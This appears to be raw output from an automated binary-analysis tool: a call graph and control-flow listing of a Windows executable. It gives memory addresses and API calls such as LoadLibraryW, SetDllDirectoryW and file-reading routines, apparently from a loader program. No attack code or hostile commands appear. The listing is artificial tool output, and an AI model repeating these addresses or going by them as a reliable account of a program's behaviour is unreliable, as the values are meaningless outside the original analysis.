7ff72b051bf0 49 API calls 21502->21506 21503 7ff72b053814 21713 7ff72b057c40 84 API calls 2 library calls 21503->21713 21504 7ff72b05389e SetDllDirectoryW 21513 7ff72b0538c3 21504->21513 21507 7ff72b0536f1 21506->21507 21510 7ff72b0536fc 21507->21510 21507->21511 21677 7ff72b0525f0 53 API calls _log10_special 21510->21677 21654 7ff72b0586b0 21511->21654 21516 7ff72b053a50 21513->21516 21718 7ff72b056560 53 API calls 21513->21718 21515 7ff72b053834 21515->21482 21515->21511 21518 7ff72b053a7d 21516->21518 21519 7ff72b053a5a PostMessageW GetMessageW 21516->21519 21659 7ff72b053080 21518->21659 21519->21518 21520 7ff72b0538d5 21719 7ff72b056b00 118 API calls 2 library calls 21520->21719 21522 7ff72b0538ea 21524 7ff72b053947 21522->21524 21526 7ff72b053901 21522->21526 21720 7ff72b0565a0 121 API calls _log10_special 21522->21720 21524->21516 21530 7ff72b05395c 21524->21530 21539 7ff72b053905 21526->21539 21721 7ff72b056970 91 API calls 21526->21721 21725 7ff72b0530e0 122 API calls 2 library calls 21530->21725 21533 7ff72b053916 21533->21539 21722 7ff72b056cd0 54 API calls 21533->21722 21535 7ff72b053964 21535->21477 21538 7ff72b05396c 21535->21538 21537 7ff72b053aa3 21726 7ff72b0583e0 LocalFree 21538->21726 21539->21524 21723 7ff72b052870 53 API calls _log10_special 21539->21723 21542 7ff72b05393f 21724 7ff72b056780 FreeLibrary 21542->21724 21564->21437 21565 7ff72b05c5d8 GetModuleHandleW 21565->21445 21566->21447 21567->21433 21568->21436 21569->21453 21571 7ff72b05c5ab GetStartupInfoW 21570->21571 21571->21439 21575 7ff72b06e790 21572->21575 21573 7ff72b06e7e3 21728 7ff72b069b24 37 API calls 2 library calls 21573->21728 21575->21573 21576 7ff72b06e836 21575->21576 21729 7ff72b06e668 71 API calls _fread_nolock 21576->21729 21577 7ff72b06e80c 21577->21460 21730 7ff72b05bb70 21579->21730 21582 7ff72b05341b 21737 7ff72b0529e0 51 API calls _log10_special 21582->21737 21583 7ff72b053438 21732 7ff72b0585a0 FindFirstFileExW 21583->21732 21587 7ff72b05344b 21738 7ff72b058620 CreateFileW GetFinalPathNameByHandleW CloseHandle 21587->21738 21588 7ff72b0534a5 21740 7ff72b058760 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 21588->21740 21590 7ff72b05b870 _log10_special 8 API calls 21593 7ff72b0534dd 21590->21593 21592 7ff72b0534b3 21599 7ff72b05342e 21592->21599 21741 7ff72b0526c0 49 API calls _log10_special 21592->21741 21593->21477 21601 7ff72b0518f0 21593->21601 21594 7ff72b053458 21595 7ff72b05345c 21594->21595 21598 7ff72b053474 __vcrt_FlsAlloc 21594->21598 21739 7ff72b0526c0 49 API calls _log10_special 21595->21739 21598->21588 21599->21590 21600 7ff72b05346d 21600->21599 21602 7ff72b053f70 108 API calls 21601->21602 21603 7ff72b051925 21602->21603 21604 7ff72b051bb6 21603->21604 21606 7ff72b0576a0 83 API calls 21603->21606 21605 7ff72b05b870 _log10_special 8 API calls 21604->21605 21607 7ff72b051bd1 21605->21607 21608 7ff72b05196b 21606->21608 21607->21467 21607->21468 21616 7ff72b05199c 21608->21616 21742 7ff72b05f9f4 21608->21742 21609 7ff72b05f36c 74 API calls 21609->21604 21611 7ff72b051985 21612 7ff72b051989 21611->21612 21613 7ff72b0519a1 21611->21613 21749 7ff72b052760 53 API calls 2 library calls 21612->21749 21746 7ff72b05f6bc 21613->21746 21616->21609 21618 7ff72b0519d7 21621 7ff72b0519ee 21618->21621 21622 7ff72b051a06 21618->21622 21619 7ff72b0519bf 21750 7ff72b052760 53 API calls 2 library calls 21619->21750 21751 7ff72b052760 53 API calls 2 library calls 21621->21751 21623 7ff72b051bf0 49 API calls 21622->21623 21625 7ff72b051a1d 21623->21625 21626 7ff72b051bf0 49 API calls 21625->21626 21627 7ff72b051a68 21626->21627 21628 7ff72b05f9f4 73 API calls 21627->21628 21629 7ff72b051a8c 21628->21629 21630 7ff72b051ab9 21629->21630 21631 7ff72b051aa1 21629->21631 21633 7ff72b05f6bc _fread_nolock 53 API calls 21630->21633 21752 7ff72b052760 53 API calls 2 library calls 21631->21752 21634 7ff72b051ace 21633->21634 21635 7ff72b051aec 21634->21635 21636 7ff72b051ad4 21634->21636 21754 7ff72b05f430 37 API calls 2 library calls 21635->21754 21753 7ff72b052760 53 API calls 2 library calls 21636->21753 21639 7ff72b051b06 21639->21616 21755 7ff72b0525f0 53 API calls _log10_special 21639->21755 21642 7ff72b057e1a 21641->21642 21643 7ff72b0586b0 2 API calls 21642->21643 21644 7ff72b057e39 GetEnvironmentVariableW 21643->21644 21645 7ff72b057e56 ExpandEnvironmentStringsW 21644->21645 21646 7ff72b057ea2 21644->21646 21645->21646 21648 7ff72b057e78 21645->21648 21647 7ff72b05b870 _log10_special 8 API calls 21646->21647 21649 7ff72b057eb4 21647->21649 21785 7ff72b058760 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 21648->21785 21649->21476 21651 7ff72b057e8a 21652 7ff72b05b870 _log10_special 8 API calls 21651->21652 21653 7ff72b057e9a 21652->21653 21653->21476 21655 7ff72b0586d2 MultiByteToWideChar 21654->21655 21657 7ff72b0586f6 21654->21657 21655->21657 21658 7ff72b05870c __std_exception_copy 21655->21658 21656 7ff72b058713 MultiByteToWideChar 21656->21658 21657->21656 21657->21658 21658->21504 21786 7ff72b055af0 21659->21786 21663 7ff72b0530a1 21667 7ff72b0530b9 21663->21667 21856 7ff72b055800 21663->21856 21665 7ff72b0530ad 21665->21667 21865 7ff72b055990 53 API calls 21665->21865 21668 7ff72b0533a0 21667->21668 21669 7ff72b0533ae 21668->21669 21671 7ff72b0533bf 21669->21671 21998 7ff72b058180 FreeLibrary 21669->21998 21727 7ff72b056780 FreeLibrary 21671->21727 21673 7ff72b051c15 21672->21673 21999 7ff72b063ca4 21673->21999 21676->21495 21677->21477 21679 7ff72b05b879 21678->21679 21680 7ff72b05372a 21679->21680 21681 7ff72b05bc00 IsProcessorFeaturePresent 21679->21681 21680->21565 21682 7ff72b05bc18 21681->21682 22022 7ff72b05bdf8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 21682->22022 21684 7ff72b05bc2b 22023 7ff72b05bbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21684->22023 21688 7ff72b053f7c 21687->21688 21689 7ff72b0586b0 2 API calls 21688->21689 21690 7ff72b053fa4 21689->21690 21691 7ff72b0586b0 2 API calls 21690->21691 21692 7ff72b053fb7 21691->21692 22024 7ff72b0652a4 21692->22024 21695 7ff72b05b870 _log10_special 8 API calls 21696 7ff72b053746 21695->21696 21696->21472 21697 7ff72b0576a0 21696->21697 21698 7ff72b0576c4 21697->21698 21699 7ff72b05f9f4 73 API calls 21698->21699 21704 7ff72b05779b __std_exception_copy 21698->21704 21700 7ff72b0576e0 21699->21700 21700->21704 22192 7ff72b066bd8 21700->22192 21702 7ff72b05f9f4 73 API calls 21705 7ff72b0576f5 21702->21705 21703 7ff72b05f6bc _fread_nolock 53 API calls 21703->21705 21704->21478 21705->21702 21705->21703 21705->21704 21707 7ff72b05f39c 21706->21707 22208 7ff72b05f148 21707->22208 21709 7ff72b05f3b5 21709->21472 21710->21477 21711->21477 21712->21503 21713->21515 21714->21489 21716 7ff72b051bf0 49 API calls 21715->21716 21717 7ff72b054010 21716->21717 21717->21511 21718->21520 21719->21522 21720->21526 21721->21533 21722->21539 21723->21542 21724->21524 21725->21535 21727->21537 21728->21577 21729->21577 21731 7ff72b0533ec GetModuleFileNameW 21730->21731 21731->21582 21731->21583 21733 7ff72b0585df FindClose 21732->21733 21734 7ff72b0585f2 21732->21734 21733->21734 21735 7ff72b05b870 _log10_special 8 API calls 21734->21735 21736 7ff72b053442 21735->21736 21736->21587 21736->21588 21737->21599 21738->21594 21739->21600 21740->21592 21741->21599 21743 7ff72b05fa24 21742->21743 21756 7ff72b05f784 21743->21756 21745 7ff72b05fa3d 21745->21611 21769 7ff72b05f6dc 21746->21769 21749->21616 21750->21616 21751->21616 21752->21616 21753->21616 21754->21639 21755->21616 21757 7ff72b05f7ee 21756->21757 21758 7ff72b05f7ae 21756->21758 21757->21758 21760 7ff72b05f7fa 21757->21760 21768 7ff72b069b24 37 API calls 2 library calls 21758->21768 21767 7ff72b06477c EnterCriticalSection 21760->21767 21762 7ff72b05f7ff 21763 7ff72b05f908 71 API calls 21762->21763 21764 7ff72b05f811 21763->21764 21765 7ff72b064788 _fread_nolock LeaveCriticalSection 21764->21765 21766 7ff72b05f7d5 21765->21766 21766->21745 21768->21766 21770 7ff72b05f706 21769->21770 21781 7ff72b0519b9 21769->21781 21771 7ff72b05f715 __scrt_get_show_window_mode 21770->21771 21772 7ff72b05f752 21770->21772 21770->21781 21783 7ff72b0643f4 11 API calls _get_daylight 21771->21783 21782 7ff72b06477c EnterCriticalSection 21772->21782 21774 7ff72b05f75a 21776 7ff72b05f45c _fread_nolock 51 API calls 21774->21776 21778 7ff72b05f771 21776->21778 21777 7ff72b05f72a 21784 7ff72b069bf0 37 API calls _invalid_parameter_noinfo 21777->21784 21780 7ff72b064788 _fread_nolock LeaveCriticalSection 21778->21780 21780->21781 21781->21618 21781->21619 21783->21777 21784->21781 21785->21651 21787 7ff72b055b05 21786->21787 21788 7ff72b051bf0 49 API calls 21787->21788 21789 7ff72b055b41 21788->21789 21790 7ff72b055b6d 21789->21790 21791 7ff72b055b4a 21789->21791 21793 7ff72b053fe0 49 API calls 21790->21793 21876 7ff72b0525f0 53 API calls _log10_special 21791->21876 21795 7ff72b055b85 21793->21795 21794 7ff72b055b63 21798 7ff72b05b870 _log10_special 8 API calls 21794->21798 21796 7ff72b055ba3 21795->21796 21877 7ff72b0525f0 53 API calls _log10_special 21795->21877 21866 7ff72b053f10 21796->21866 21801 7ff72b05308e 21798->21801 21801->21667 21817 7ff72b055c80 21801->21817 21802 7ff72b055bbb 21804 7ff72b053fe0 49 API calls 21802->21804 21803 7ff72b0581a0 3 API calls 21803->21802 21805 7ff72b055bd4 21804->21805 21806 7ff72b055bf9 21805->21806 21807 7ff72b055bd9 21805->21807 21872 7ff72b0581a0 21806->21872 21878 7ff72b0525f0 53 API calls _log10_special 21807->21878 21810 7ff72b055c06 21811 7ff72b055c49 21810->21811 21812 7ff72b055c12 21810->21812 21880 7ff72b0550b0 95 API calls 21811->21880 21814 7ff72b0586b0 2 API calls 21812->21814 21815 7ff72b055c2a 21814->21815 21879 7ff72b0529e0 51 API calls _log10_special 21815->21879 21881 7ff72b054c80 21817->21881 21819 7ff72b055cba 21820 7ff72b055cd3 21819->21820 21821 7ff72b055cc2 21819->21821 21888 7ff72b054450 21820->21888 21913 7ff72b0525f0 53 API calls _log10_special 21821->21913 21825 7ff72b055cdf 21914 7ff72b0525f0 53 API calls _log10_special 21825->21914 21826 7ff72b055cf0 21829 7ff72b055cff 21826->21829 21830 7ff72b055d10 21826->21830 21828 7ff72b055cce 21828->21663 21915 7ff72b0525f0 53 API calls _log10_special 21829->21915 21892 7ff72b054700 21830->21892 21833 7ff72b055d2b 21834 7ff72b055d2f 21833->21834 21835 7ff72b055d40 21833->21835 21916 7ff72b0525f0 53 API calls _log10_special 21834->21916 21837 7ff72b055d4f 21835->21837 21838 7ff72b055d60 21835->21838 21917 7ff72b0525f0 53 API calls _log10_special 21837->21917 21899 7ff72b0545a0 21838->21899 21842 7ff72b055d6f 21918 7ff72b0525f0 53 API calls _log10_special 21842->21918 21843 7ff72b055d80 21845 7ff72b055d8f 21843->21845 21846 7ff72b055da0 21843->21846 21919 7ff72b0525f0 53 API calls _log10_special 21845->21919 21848 7ff72b055db1 21846->21848 21850 7ff72b055dc2 21846->21850 21920 7ff72b0525f0 53 API calls _log10_special 21848->21920 21853 7ff72b055dec 21850->21853 21921 7ff72b0665c0 73 API calls 21850->21921 21852 7ff72b055dda 21922 7ff72b0665c0 73 API calls 21852->21922 21853->21828 21923 7ff72b0525f0 53 API calls _log10_special 21853->21923 21857 7ff72b055820 21856->21857 21857->21857 21858 7ff72b055849 21857->21858 21863 7ff72b055860 __std_exception_copy 21857->21863 21951 7ff72b0525f0 53 API calls _log10_special 21858->21951 21860 7ff72b055855 21860->21665 21862 7ff72b0525f0 53 API calls 21862->21863 21863->21862 21864 7ff72b05596b 21863->21864 21927 7ff72b051440 21863->21927 21864->21665 21865->21667 21867 7ff72b053f1a 21866->21867 21868 7ff72b0586b0 2 API calls 21867->21868 21869 7ff72b053f3f 21868->21869 21870 7ff72b05b870 _log10_special 8 API calls 21869->21870 21871 7ff72b053f67 21870->21871 21871->21802 21871->21803 21873 7ff72b0586b0 2 API calls 21872->21873 21874 7ff72b0581b4 LoadLibraryW 21873->21874 21875 7ff72b0581d3 __std_exception_copy 21874->21875 21875->21810 21876->21794 21877->21796 21878->21794 21879->21794 21880->21794 21883 7ff72b054cac 21881->21883 21882 7ff72b054cb4 21882->21819 21883->21882 21886 7ff72b054e54 21883->21886 21924 7ff72b065db4 48 API calls 21883->21924 21884 7ff72b055017 __std_exception_copy 21884->21819 21885 7ff72b054180 47 API calls 21885->21886 21886->21884 21886->21885 21889 7ff72b054480 21888->21889 21890 7ff72b05b870 _log10_special 8 API calls 21889->21890 21891 7ff72b0544ea 21890->21891 21891->21825 21891->21826 21893 7ff72b05476f 21892->21893 21895 7ff72b05471b 21892->21895 21926 7ff72b054300 MultiByteToWideChar MultiByteToWideChar __std_exception_copy 21893->21926 21898 7ff72b05475a 21895->21898 21925 7ff72b054300 MultiByteToWideChar MultiByteToWideChar __std_exception_copy 21895->21925 21896 7ff72b05477c 21896->21833 21898->21833 21900 7ff72b0545b5 21899->21900 21901 7ff72b051bf0 49 API calls 21900->21901 21902 7ff72b054601 21901->21902 21903 7ff72b051bf0 49 API calls 21902->21903 21912 7ff72b054687 __std_exception_copy 21902->21912 21904 7ff72b054640 21903->21904 21907 7ff72b0586b0 2 API calls 21904->21907 21904->21912 21905 7ff72b05b870 _log10_special 8 API calls 21906 7ff72b0546dc 21905->21906 21906->21842 21906->21843 21908 7ff72b05465a 21907->21908 21909 7ff72b0586b0 2 API calls 21908->21909 21910 7ff72b054671 21909->21910 21911 7ff72b0586b0 2 API calls 21910->21911 21911->21912 21912->21905 21913->21828 21914->21828 21915->21828 21916->21828 21917->21828 21918->21828 21919->21828 21920->21828 21921->21852 21922->21853 21923->21828 21924->21883 21925->21898 21926->21896 21928 7ff72b053f70 108 API calls 21927->21928 21929 7ff72b051463 21928->21929 21930 7ff72b05146b 21929->21930 21931 7ff72b05148c 21929->21931 21970 7ff72b0525f0 53 API calls _log10_special 21930->21970 21933 7ff72b05f9f4 73 API calls 21931->21933 21935 7ff72b0514a1 21933->21935 21934 7ff72b05147b 21934->21863 21936 7ff72b0514a5 21935->21936 21937 7ff72b0514c1 21935->21937 21971 7ff72b052760 53 API calls 2 library calls 21936->21971 21939 7ff72b0514f1 21937->21939 21940 7ff72b0514d1 21937->21940 21942 7ff72b0514f7 21939->21942 21948 7ff72b05150a 21939->21948 21972 7ff72b052760 53 API calls 2 library calls 21940->21972 21941 7ff72b05f36c 74 API calls 21944 7ff72b051584 21941->21944 21952 7ff72b0511f0 21942->21952 21944->21863 21946 7ff72b0514bc __std_exception_copy 21946->21941 21947 7ff72b05f6bc _fread_nolock 53 API calls 21947->21948 21948->21946 21948->21947 21949 7ff72b051596 21948->21949 21973 7ff72b052760 53 API calls 2 library calls 21949->21973 21951->21860 21953 7ff72b051248 21952->21953 21954 7ff72b051277 21953->21954 21955 7ff72b05124f 21953->21955 21958 7ff72b051291 21954->21958 21960 7ff72b0512ad 21954->21960 21978 7ff72b0525f0 53 API calls _log10_special 21955->21978 21957 7ff72b051262 21957->21946 21979 7ff72b052760 53 API calls 2 library calls 21958->21979 21961 7ff72b0512bf 21960->21961 21969 7ff72b0512db memcpy_s 21960->21969 21980 7ff72b052760 53 API calls 2 library calls 21961->21980 21963 7ff72b05f6bc _fread_nolock 53 API calls 21963->21969 21964 7ff72b05f430 37 API calls 21964->21969 21965 7ff72b0512a8 __std_exception_copy 21965->21946 21966 7ff72b05139f 21981 7ff72b0525f0 53 API calls _log10_special 21966->21981 21969->21963 21969->21964 21969->21965 21969->21966 21974 7ff72b05fdfc 21969->21974 21970->21934 21971->21946 21972->21946 21973->21946 21975 7ff72b05fe2c 21974->21975 21982 7ff72b05fb4c 21975->21982 21977 7ff72b05fe4a 21977->21969 21978->21957 21979->21965 21980->21965 21981->21965 21983 7ff72b05fb6c 21982->21983 21988 7ff72b05fb99 21982->21988 21984 7ff72b05fb76 21983->21984 21985 7ff72b05fba1 21983->21985 21983->21988 21996 7ff72b069b24 37 API calls 2 library calls 21984->21996 21989 7ff72b05fa8c 21985->21989 21988->21977 21997 7ff72b06477c EnterCriticalSection 21989->21997 21991 7ff72b05faa9 21992 7ff72b05facc 74 API calls 21991->21992 21993 7ff72b05fab2 21992->21993 21994 7ff72b064788 _fread_nolock LeaveCriticalSection 21993->21994 21995 7ff72b05fabd 21994->21995 21995->21988 21996->21988 21998->21671 22000 7ff72b063cfe 21999->22000 22001 7ff72b063d23 22000->22001 22003 7ff72b063d5f 22000->22003 22017 7ff72b069b24 37 API calls 2 library calls 22001->22017 22018 7ff72b061f30 49 API calls _invalid_parameter_noinfo 22003->22018 22005 7ff72b063d4d 22007 7ff72b05b870 _log10_special 8 API calls 22005->22007 22006 7ff72b063e3c 22021 7ff72b069c58 11 API calls 2 library calls 22006->22021 22010 7ff72b051c38 22007->22010 22009 7ff72b063df6 22009->22006 22011 7ff72b063e60 22009->22011 22012 7ff72b063e11 22009->22012 22015 7ff72b063e08 22009->22015 22010->21485 22011->22006 22013 7ff72b063e6a 22011->22013 22019 7ff72b069c58 11 API calls 2 library calls 22012->22019 22020 7ff72b069c58 11 API calls 2 library calls 22013->22020 22015->22006 22015->22012 22017->22005 22018->22009 22019->22005 22020->22005 22021->22005 22022->21684 22025 7ff72b0651d8 22024->22025 22026 7ff72b0651fe 22025->22026 22029 7ff72b065231 22025->22029 22055 7ff72b0643f4 11 API calls _get_daylight 22026->22055 22028 7ff72b065203 22056 7ff72b069bf0 37 API calls _invalid_parameter_noinfo 22028->22056 22031 7ff72b065237 22029->22031 22032 7ff72b065244 22029->22032 22057 7ff72b0643f4 11 API calls _get_daylight 22031->22057 22043 7ff72b069f38 22032->22043 22036 7ff72b065258 22058 7ff72b0643f4 11 API calls _get_daylight 22036->22058 22037 7ff72b065265 22050 7ff72b06f1dc 22037->22050 22040 7ff72b065278 22059 7ff72b064788 LeaveCriticalSection 22040->22059 22042 7ff72b053fc6 22042->21695 22060 7ff72b06f5e8 EnterCriticalSection 22043->22060 22045 7ff72b069f4f 22046 7ff72b069fac 19 API calls 22045->22046 22047 7ff72b069f5a 22046->22047 22048 7ff72b06f648 _isindst LeaveCriticalSection 22047->22048 22049 7ff72b06524e 22048->22049 22049->22036 22049->22037 22061 7ff72b06eed8 22050->22061 22053 7ff72b06f236 22053->22040 22055->22028 22056->22042 22057->22042 22058->22042 22066 7ff72b06ef13 __vcrt_FlsAlloc 22061->22066 22063 7ff72b06f1b1 22080 7ff72b069bf0 37 API calls _invalid_parameter_noinfo 22063->22080 22065 7ff72b06f0e3 22065->22053 22073 7ff72b076064 22065->22073 22071 7ff72b06f0da 22066->22071 22076 7ff72b066d4c 51 API calls 3 library calls 22066->22076 22068 7ff72b06f145 22068->22071 22077 7ff72b066d4c 51 API calls 3 library calls 22068->22077 22070 7ff72b06f164 22070->22071 22078 7ff72b066d4c 51 API calls 3 library calls 22070->22078 22071->22065 22079 7ff72b0643f4 11 API calls _get_daylight 22071->22079 22081 7ff72b075664 22073->22081 22076->22068 22077->22070 22078->22071 22079->22063 22080->22065 22082 7ff72b07567b 22081->22082 22083 7ff72b075699 22081->22083 22135 7ff72b0643f4 11 API calls _get_daylight 22082->22135 22083->22082 22085 7ff72b0756b5 22083->22085 22092 7ff72b075c74 22085->22092 22086 7ff72b075680 22136 7ff72b069bf0 37 API calls _invalid_parameter_noinfo 22086->22136 22090 7ff72b07568c 22090->22053 22138 7ff72b0759a8 22092->22138 22095 7ff72b075ce9 22170 7ff72b0643d4 11 API calls _get_daylight 22095->22170 22096 7ff72b075d01 22158 7ff72b067830 22096->22158 22099 7ff72b075cee 22171 7ff72b0643f4 11 API calls _get_daylight 22099->22171 22127 7ff72b0756e0 22127->22090 22137 7ff72b067808 LeaveCriticalSection 22127->22137 22135->22086 22136->22090 22139 7ff72b0759d4 22138->22139 22140 7ff72b0759ee 22138->22140 22139->22140 22183 7ff72b0643f4 11 API calls _get_daylight 22139->22183 22144 7ff72b075a6c 22140->22144 22185 7ff72b0643f4 11 API calls _get_daylight 22140->22185 22142 7ff72b0759e3 22184 7ff72b069bf0 37 API calls _invalid_parameter_noinfo 22142->22184 22145 7ff72b075abd 22144->22145 22187 7ff72b0643f4 11 API calls _get_daylight 22144->22187 22155 7ff72b075b1a 22145->22155 22189 7ff72b068e90 37 API calls 2 library calls 22145->22189 22148 7ff72b075b16 22151 7ff72b075b98 22148->22151 22148->22155 22150 7ff72b075ab2 22188 7ff72b069bf0 37 API calls _invalid_parameter_noinfo 22150->22188 22190 7ff72b069c10 17 API calls __GetCurrentState 22151->22190 22152 7ff72b075a61 22186 7ff72b069bf0 37 API calls _invalid_parameter_noinfo 22152->22186 22155->22095 22155->22096 22191 7ff72b06f5e8 EnterCriticalSection 22158->22191 22170->22099 22171->22127 22183->22142 22184->22140 22185->22152 22186->22144 22187->22150 22188->22145 22189->22148 22193 7ff72b066c08 22192->22193 22196 7ff72b0666e4 22193->22196 22195 7ff72b066c21 22195->21705 22197 7ff72b06672e 22196->22197 22198 7ff72b0666ff 22196->22198 22206 7ff72b06477c EnterCriticalSection 22197->22206 22207 7ff72b069b24 37 API calls 2 library calls 22198->22207 22201 7ff72b066733 22202 7ff72b066750 38 API calls 22201->22202 22203 7ff72b06673f 22202->22203 22204 7ff72b064788 _fread_nolock LeaveCriticalSection 22203->22204 22205 7ff72b06671f 22204->22205 22205->22195 22207->22205 22209 7ff72b05f163 22208->22209 22210 7ff72b05f191 22208->22210 22219 7ff72b069b24 37 API calls 2 library calls 22209->22219 22212 7ff72b05f183 22210->22212 22218 7ff72b06477c EnterCriticalSection 22210->22218 22212->21709 22214 7ff72b05f1a8 22215 7ff72b05f1c4 72 API calls 22214->22215 22216 7ff72b05f1b4 22215->22216 22217 7ff72b064788 _fread_nolock LeaveCriticalSection 22216->22217 22217->22212 22219->22212 22331 7ff72b069060 11 API calls 22332 7ff72b077060 CloseHandle 22333 7ffe0c0b4bef 15 API calls 5 library calls 22336 7ffe0c0b44b4 free 22387 7ffe0c0b4e74 21 API calls 4 library calls 22388 7ff72b072790 GetProcessHeap 22220 7ff72b068c79 22232 7ff72b0696e8 22220->22232 22222 7ff72b068c7e 22223 7ff72b068ca5 GetModuleHandleW 22222->22223 22224 7ff72b068cef 22222->22224 22223->22224 22228 7ff72b068cb2 22223->22228 22225 7ff72b068b7c 11 API calls 22224->22225 22226 7ff72b068d2b 22225->22226 22227 7ff72b068d32 22226->22227 22229 7ff72b068d48 11 API calls 22226->22229 22228->22224 22231 7ff72b068da0 GetModuleHandleExW GetProcAddress FreeLibrary 22228->22231 22230 7ff72b068d44 22229->22230 22231->22224 22237 7ff72b06a460 45 API calls 3 library calls 22232->22237 22234 7ff72b0696f1 22238 7ff72b069814 45 API calls __GetCurrentState 22234->22238 22237->22234 22341 7ff72b05c084 GetModuleHandleW __GetCurrentState 22389 7ffe0c0bf9a0 43 API calls _CatchTryBlock 22390 7ff72b070b84 44 API calls 5 library calls 22391 7ff72b05cb80 10 API calls 2 library calls 22392 7ff72b05e5a8 59 API calls 5 library calls 22343 7ffe0c0b24d0 13 API calls _CatchTryBlock 22347 7ffe0c0b62d0 20 API calls __unDName 22348 7ff72b06ec9c 55 API calls 3 library calls 22396 7ff72b06f5a0 7 API calls 22397 7ff72b078fcc 55 API calls __CxxCallCatchBlock 22398 7ff72b059ca3 12 API calls 22352 7ff72b05c0d0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 22401 7ffe0c0be9e0 15 API calls 2 library calls 22403 7ff72b0709c0 74 API calls 2 library calls 22404 7ff72b05e7e8 37 API calls __std_exception_copy 22406 7ffe0c0b461a 15 API calls 2 library calls 22355 7ffe0c0b4710 15 API calls 4 library calls 22407 7ffe0c0bfe10 RtlUnwindEx __C_specific_handler __GSHandlerCheckCommon 22356 7ff72b079ef3 LeaveCriticalSection _fread_nolock 22357 7ffe0c0b5f0a RtlPcToFileHeader RtlPcToFileHeader RtlPcToFileHeader RaiseException FindMITargetTypeInstance 22408 7ff72b05e9da 55 API calls __CxxCallCatchBlock 22409 7ff72b06fbd8 77 API calls 4 library calls 22410 7ff72b0645e0 17 API calls 2 library calls 22412 7ffe0c0bfa38 38 API calls _CatchTryBlock 22362 7ffe0c0b6530 14 API calls _CatchTryBlock 22363 7ffe0c0b2530 terminate 22364 7ff72b05f110 GetCommandLineA GetCommandLineW 22367 7ffe0c0b5520 23 API calls 5 library calls 22368 7ffe0c0b4520 14 API calls 4 library calls 22413 7ffe0c0b4424 malloc strcpy_s free 22272 7ff72b052d00 22273 7ff72b052d10 22272->22273 22274 7ff72b052d4b 22273->22274 22275 7ff72b052d61 22273->22275 22300 7ff72b0525f0 53 API calls _log10_special 22274->22300 22277 7ff72b052d81 22275->22277 22288 7ff72b052d97 __std_exception_copy 22275->22288 22301 7ff72b0525f0 53 API calls _log10_special 22277->22301 22279 7ff72b05b870 _log10_special 8 API calls 22281 7ff72b052f1a 22279->22281 22280 7ff72b052d57 __std_exception_copy 22280->22279 22282 7ff72b051440 116 API calls 22282->22288 22283 7ff72b053069 22308 7ff72b0525f0 53 API calls _log10_special 22283->22308 22285 7ff72b051bf0 49 API calls 22285->22288 22286 7ff72b053053 22307 7ff72b0525f0 53 API calls _log10_special 22286->22307 22288->22280 22288->22282 22288->22283 22288->22285 22288->22286 22289 7ff72b05302d 22288->22289 22291 7ff72b052f27 22288->22291 22306 7ff72b0525f0 53 API calls _log10_special 22289->22306 22292 7ff72b052f93 22291->22292 22302 7ff72b069714 37 API calls 2 library calls 22291->22302 22294 7ff72b052fbe 22292->22294 22295 7ff72b052fb0 22292->22295 22304 7ff72b052af0 37 API calls 22294->22304 22303 7ff72b069714 37 API calls 2 library calls 22295->22303 22298 7ff72b052fbc 22305 7ff72b052470 54 API calls __std_exception_copy 22298->22305 22300->22280 22301->22280 22302->22292 22303->22298 22304->22298 22305->22280 22306->22280 22307->22280 22308->22280

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 7ff72b051000-7ff72b053536 call 7ff72b05f138 call 7ff72b05f140 call 7ff72b05bb70 call 7ff72b064700 call 7ff72b064794 call 7ff72b0533e0 14 7ff72b053538-7ff72b05353f 0->14 15 7ff72b053544-7ff72b053566 call 7ff72b0518f0 0->15 16 7ff72b05371a-7ff72b053735 call 7ff72b05b870 14->16 21 7ff72b05356c-7ff72b053583 call 7ff72b051bf0 15->21 22 7ff72b053736-7ff72b05374c call 7ff72b053f70 15->22 26 7ff72b053588-7ff72b0535c1 21->26 29 7ff72b05374e-7ff72b05377b call 7ff72b0576a0 22->29 30 7ff72b053785-7ff72b05379a call 7ff72b0525f0 22->30 27 7ff72b0535c7-7ff72b0535cb 26->27 28 7ff72b053653-7ff72b05366d call 7ff72b057e10 26->28 31 7ff72b0535cd-7ff72b0535e5 call 7ff72b064560 27->31 32 7ff72b053638-7ff72b05364d call 7ff72b0518e0 27->32 42 7ff72b053695-7ff72b05369c 28->42 43 7ff72b05366f-7ff72b053675 28->43 45 7ff72b05377d-7ff72b053780 call 7ff72b05f36c 29->45 46 7ff72b05379f-7ff72b0537be call 7ff72b051bf0 29->46 44 7ff72b053712 30->44 48 7ff72b0535e7-7ff72b0535eb 31->48 49 7ff72b0535f2-7ff72b05360a call 7ff72b064560 31->49 32->27 32->28 53 7ff72b053844-7ff72b053863 call 7ff72b053e90 42->53 54 7ff72b0536a2-7ff72b0536c0 call 7ff72b057e10 call 7ff72b057f80 42->54 50 7ff72b053677-7ff72b053680 43->50 51 7ff72b053682-7ff72b053690 call 7ff72b06415c 43->51 44->16 45->30 61 7ff72b0537c1-7ff72b0537ca 46->61 48->49 66 7ff72b05360c-7ff72b053610 49->66 67 7ff72b053617-7ff72b05362f call 7ff72b064560 49->67 50->51 51->42 69 7ff72b053865-7ff72b05386f call 7ff72b053fe0 53->69 70 7ff72b053871-7ff72b053882 call 7ff72b051bf0 53->70 79 7ff72b0536c6-7ff72b0536c9 54->79 80 7ff72b05380f-7ff72b05381e call 7ff72b058400 54->80 61->61 65 7ff72b0537cc-7ff72b0537e9 call 7ff72b0518f0 61->65 65->26 84 7ff72b0537ef-7ff72b053800 call 7ff72b0525f0 65->84 66->67 67->32 85 7ff72b053631 67->85 76 7ff72b053887-7ff72b0538a1 call 7ff72b0586b0 69->76 70->76 94 7ff72b0538a3 76->94 95 7ff72b0538af-7ff72b0538c1 SetDllDirectoryW 76->95 79->80 86 7ff72b0536cf-7ff72b0536f6 call 7ff72b051bf0 79->86 92 7ff72b05382c-7ff72b053836 call 7ff72b057c40 80->92 93 7ff72b053820 80->93 84->44 85->32 97 7ff72b0536fc-7ff72b053703 call 7ff72b0525f0 86->97 98 7ff72b053805-7ff72b05380d call 7ff72b06415c 86->98 92->76 110 7ff72b053838 92->110 93->92 94->95 100 7ff72b0538c3-7ff72b0538ca 95->100 101 7ff72b0538d0-7ff72b0538ec call 7ff72b056560 